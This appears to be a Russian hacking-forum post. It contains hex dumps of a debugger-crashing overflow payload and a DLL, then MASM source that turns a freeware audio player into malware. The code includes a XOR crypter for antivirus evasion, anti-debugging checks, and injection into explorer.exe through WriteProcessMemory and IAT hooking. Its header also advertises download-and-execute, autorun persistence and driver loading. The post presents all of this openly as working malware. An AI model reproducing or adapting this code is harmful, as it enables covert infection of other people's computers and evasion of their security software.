000009B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000009C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000009D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000009E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000009F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000A90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000AA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000AB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000AC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000AD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000AE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000AF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000B90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000BA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000BB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000BC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000BD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000BE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000BF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000C90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000CA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000CB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000CC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000CD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000CE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000CF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000D90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000DA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000DB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000DC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000DD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000DE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000DF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000E90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000EA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000EB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000EC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000ED0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000EE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000EF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F00 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F30 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F40 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000F90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000FA0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000FB0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000FC0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000FD0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000FE0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000FF0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00001000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00001010 8A 1D F3 77 90 90 90 90 6A 00 8B C4 83 C0 27 50 Љ уw j ‹ДѓА'P
00001020 50 6A 00 8B C4 83 C0 2B 50 FF 25 54 C2 4C 00 6A Pj ‹ДѓА+Pя%TВL j
00001030 00 FF 25 28 C2 4C 00 41 4D 4E 45 53 49 41 41 41 я%(ВL AMNESIAAA
00001040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00001050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00001060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00001070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00001080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00001090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000010A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000010B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000010C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000010D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000010E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000010F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00001100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00001110 41 41 41 41 00 00 00 00 00 00 00 00 00 AAAA
NEW.wav
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00000000 4D 5A 80 00 01 00 00 00 04 00 10 00 FF FF 00 00 MZЂ яя
00000010 40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 @ @
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 Ђ
00000040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 є ґ Н!ё LН!Th
00000050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
00000060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
00000070 6D 6F 64 65 2E 0D 0A 24 00 00 00 00 00 00 00 00 mode. $
00000080 50 45 00 00 4C 01 02 00 4F 22 8A 4E 00 00 00 00 PE L O"ЉN
00000090 00 00 00 00 E0 00 0E 21 0B 01 01 44 00 02 00 00 а ! D
000000A0 00 12 00 00 00 00 00 00 00 10 00 00 00 10 00 00
000000B0 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 @
000000C0 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
000000D0 00 40 00 00 00 02 00 00 F9 40 00 00 02 00 00 00 @ щ@
000000E0 00 10 00 00 00 10 00 00 00 00 01 00 00 00 00 00
000000F0 00 00 00 00 10 00 00 00 00 20 00 00 63 10 00 00 c
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000170 00 00 00 00 00 00 00 00 2E 63 6F 64 65 00 00 00 .code
00000180 0C 00 00 00 00 10 00 00 00 02 00 00 00 02 00 00
00000190 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 `
000001A0 2E 65 64 61 74 61 00 00 63 10 00 00 00 20 00 00 .edata c
000001B0 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00
000001C0 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 @ @
000001D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000200 55 89 E5 B8 01 00 00 00 C9 C2 0C 00 00 00 00 00 U‰её ЙВ
00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000003A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000003B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000003C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000003D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000003E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000003F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000400 00 00 00 00 00 00 00 00 00 00 00 00 32 20 00 00 2
00000410 01 00 00 00 01 00 00 00 01 00 00 00 28 20 00 00 (
00000420 2C 20 00 00 30 20 00 00 28 20 00 00 3E 20 00 00 , 0 ( >
00000430 00 00 6F 6C 6C 79 62 6F 66 2E 64 6C 6C 00 31 31 ollybof.dll 11
00000440 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000450 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000460 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000470 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000480 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000490 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000004A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000004B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000004C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000004D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000004E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000004F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000500 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000510 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000520 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000530 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000540 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000550 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000560 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000570 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000580 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000590 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000005A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000005B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000005C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000005D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000005E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000005F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000600 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000610 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000620 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000630 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000640 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000650 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000660 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000670 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000680 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000690 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000006A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000006B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000006C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000006D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000006E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000006F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000700 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000710 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000720 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000730 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000740 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000750 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000760 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000770 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000780 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00000790 20 20 20 2
|
|
|
|
|
RE: BSOD - 2012-02-12 14:37:32.940000
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
А талоны на усиленное питание как распространять будем?
Идея такая -> дополним и перепишем исходник плеера:
=====================================
Это небольшой плеер написаный на Ассемблере. Очень простой и удобный интерфейс.
Поддержываемые форматы:BIN, XM, IT, MOD, MID, RMI, SGT, FSB, S3M, WAV, MP2, MP3, OGG, RAW.
Возможности:СЕМЬ клавиш навигации, сворачивание в трей, установка звука, вывод размера и названия файла.
Автор: FreeCX
Мыло: FreeCX@yandex.ru
Модификация исходников:AmnesiaMMX + eLISAveta
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Ну что за гамма - как пожарная машина.
Добавим зелёного.Пускай нам по жизни светит только зелёный свет…
Спасибо WASM.RU , FreeCX , CrackLab.RU , The Jocker , Cr@wler , V_m_E_n , ГрекА,Александр Эккерт.
Ну и вам(как же без вас)спасибо!
;# \\\\\\\\\\\\\\\\ #;
;# AMNESIA FAUST GROUP PRESENTS: >>>>~~~A~~~~A~~~A~~/\~~A~~/\~~A~~/\~~A~~~A~~~A~~~|>>>-Yes>-+A+>A-> #;
;# //////////////// #;
;# Amnesia MMX Code #;
;# #;
;# Xакерский Плеер для форматов: BIN, XM, IT, MOD, MID, RMI, SGT, FSB, S3M, WAV, MP2, MP3, OGG, RAW. #:
;# +пример XOR-Crypt(a),Debugger Detect(A)Stack Segment Register))+Black AnimateWindow)+LoadLibraryA #;
;# Bof.dll(Debugger Crash Test))+AV Test -> Загрузка и запуск наших файлов и драйверов(WinXP) >>> #;
;# (URLDownToFile)+прописка в AutoRun,иньекция explorer.exe(попытка-не пытка,правда товарищ БЭэрия?) #;
;# Спасибо WASM,спаибо MASM,спасибо FreeCX & XAKEP TECHNOLOGIES !!! == == == == == == == == == == => #;
;################################################################################
_call macro procname
txt textequ <>
txt catstr <offset >, <procname>, txt
call [ebp+txt]
endm
.586
.model flat, stdcall
option casemap :none
.xlist
include data.inc
.list
.data
szMBHead db " My Program",0
szMBText db " Hallo ASM !!!",0
;------------ Random ------------;
;(Типа ГСЧ)пока не используется));
.code
Rand15 proc base:DWORD
mov eax, r9Seed
push edx
push ecx
test eax, eax
jne @F
invoke Sleep, eax ; spend some cycles here and there
invoke GetTickCount ; get a seed value
mov r9Seed, eax
@@: ffree st(7) ; free a rarely used FP register
mov ecx, 0FFFFFFH
and eax, ecx
inc eax ; make sure it's not zero
push eax
fldpi ; push PI on FPU
fimul dword ptr [esp] ; 3.14159*[1...edx+1]
db 00fh ; пишем RDTSC на опкодах
db 031h ; rdtsc(opcode) we'll use only the loword
and eax, ecx ; and 0FFFFFFH
inc eax ; make sure it's not zero
mov [esp], eax ; second external influence is rdtsc
fimul dword ptr [esp] ; *(rdtsc and 0FFFFFFH)
pop eax
fstp r9Seed ; now a cheap trick: pop a Real4 from the FPU,
mov eax, r9Seed ; but mov an integer
; and eax, 15 ; return a number between 0 and 15
xor edx, edx
mov ecx, base
div ecx
mov eax, edx
pop ecx ; restore two
pop edx ; precious registers
ret ; <-- eax random
Rand15 endp
start:
;-------------------------------------------------------------------------------------------;
db 35 dup (144) ; Оставим немного места для следующей криптообёртки или TLS ;
;-------------------------------------------------------------------------------------------;
mov eax,Next
call eax
ret
;------------------------ Message ----------------------;
Message:; Пускай AV попробуют определить логику ;
invoke MessageBox,NULL,ADDR szMBText,ADDR szMBHead,MB_OK
invoke ExitProcess,0
;------------------------------------- XOR Crypt ------------------------------------;
; Симметричный XOR-криптор.Взят за основу с WASM.RU
; (даже этот простенький,побайтовый XOR даёт шикарный AV-результат. ;
;---------------------------------------------------------------------------------------;
Next:
MOV ESI, bоdу_begin
MOV EDI, ESI
MOV ECX, bоdу_end - bоdу_begin ; 0f55 ? / Random ?
my_begin:
LODSB
XOR AL, 77h ; 77h / заменим позже на Randomize ??
STOSB
LOOP my_begin
bоdу_begin:
;------------------ Debugger Detect Code ---------------;
; (В нашем учебном образце один Anti-Debug)для примера));
;[Stack Segment Register + AnimateWindow + LoadLibraryA];
;-------------------------------------------------------;
push ss
pop ss
pushfd
nop
push ss ; junk
pop ss
pushfd ; junk
pop eax
and eax,256 ; 256
or eax, eax
jnz Found ; jnz Debugger crash
jmp NotFound
ret
Found:
; ------- BlackAnimateWindow ------;
; ---- Ооо,это мой цвет...Души ----;
invoke WindowFromPoint,13ah,100h
invoke AnimateWindow,eax,701h,90000h
;---------- OllyDbg Crash----------;
push offset Olly
call LoadLibraryA ; bof.dll(CRC32?);
RET ; не забыть привязать к Лоадеру;
NotFound:
;--------- Explorer Inject --------;
;------- (Попытаем счастья) -------;
.const
sKERNEL32_DLL db 'KERNEL32.DLL',0
sUSER32_DLL db 'USER32.DLL',0
sEXPLORER_EXE db 'EXPLORER.EXE',0
sShell_TrayWnd db 'Shell_TrayWnd',0
sCreateThread db 'CreateThread',0
sGetDlgCtrlID db 'GetDlgCtrlID',0
sMessageBox db 'MessageBoxA',0
.code
invoke GetModuleHandle,offset sKERNEL32_DLL
mov esi,eax
invoke GetProcAddress,esi,offset sCreateThread
mov @CreateThread,eax
invoke LoadLibrary,offset sUSER32_DLL
mov esi,eax
invoke GetProcAddress,esi,offset sGetDlgCtrlID
mov @GetDlgCtrlID,eax
invoke GetProcAddress,esi,offset sMessageBox
mov @MessageBox,eax
xor ebx,ebx
; Определяем хэндл процесса explorer.exe
invoke FindWindow,ADDR sShell_TrayWnd,ebx
push eax
push esp
push eax
call GetWindowThreadProcessId
; в стеке остался ProcessId
push ebx ; push FALSE
push PROCESS_ALL_ACCESS
call OpenProcess
test eax,eax
jz @@return
xchg eax,ebx
; Определяем ImageBase эксплорера и всё остальное из заголовка
invoke LoadLibrary,ADDR sEXPLORER_EXE
test eax,eax
jz @@return
push ebx
mov ebx,[eax+3ch] ; в EBX указатель на PE-header
mov esi,[eax+ebx+34h] ; Explorer ImageBase
mov @ImageBase,esi
push [eax+ebx+80h]
pop @ImportTableRVA
add @ImportTableRVA,eax
add esi,[eax+ebx+0a0h] ; теперь указывает на секцию .reloc
; ищем адрес функции GetDlgCtrlID в IAT эксплорера
mov edi,@ImportTableRVA
mov edx,'RESU'; USER32.DLL
xchg eax,ebx
@@: mov eax,[edi+0ch]
add eax,ebx
cmp [eax],edx
je @f
add edi,14h
jmp @b
@@: mov edi,[edi+10h]
add edi,ebx
mov eax,@GetDlgCtrlID
@@: scasd
jnz @b
sub edi,04h
sub edi,ebx
add edi,@ImageBase
mov iat_a,edi
; вставляем себя в секцию .reloc
pop ebx ; Хэндл Процесса
push esp
push PAGE_READWRITE
push copysize
push esi
push ebx
call VirtualProtectEx
push esp
push PAGE_READWRITE
push 04h
push iat_a
push ebx
call VirtualProtectEx
push esp
push copysize
push offset start
push esi
push ebx
call WriteProcessMemory
xchg eax,ecx
jecxz @@return
push esp
push 04h
lea edi,@tmp_buf
push edi
mov eax,offset loader - offset start
add eax,esi
stosd
push [iat_a]
push ebx
call WriteProcessMemory
@@return:
jmp @@program
; загрузчик
loader proc
pushad
xor ebx,ebx
call @f
@@: pop ebp
sub ebp,offset @b ; в ebp смещение кода
mov eax,[ebp+offset @GetDlgCtrlID]
db 0a3h
iat_a dd 0h ; mov [iat_a],eax
push eax
push esp
push ebx ; push 0
push ebp ; передаём смещение кода
lea eax,[ebp+offset ThreadProc]
push eax
push ebx ; push 0
push ebx ; push 0
_call @CreateThread
pop eax
@@: push [esp+7*4+8] ; переданный параметр
_call @GetDlgCtrlID
mov [esp+7*4],eax ; pushad.eax
popad
ret 04h
loader endp
capt db 'DeInfection',0
text db 'PikA-Bello!',0
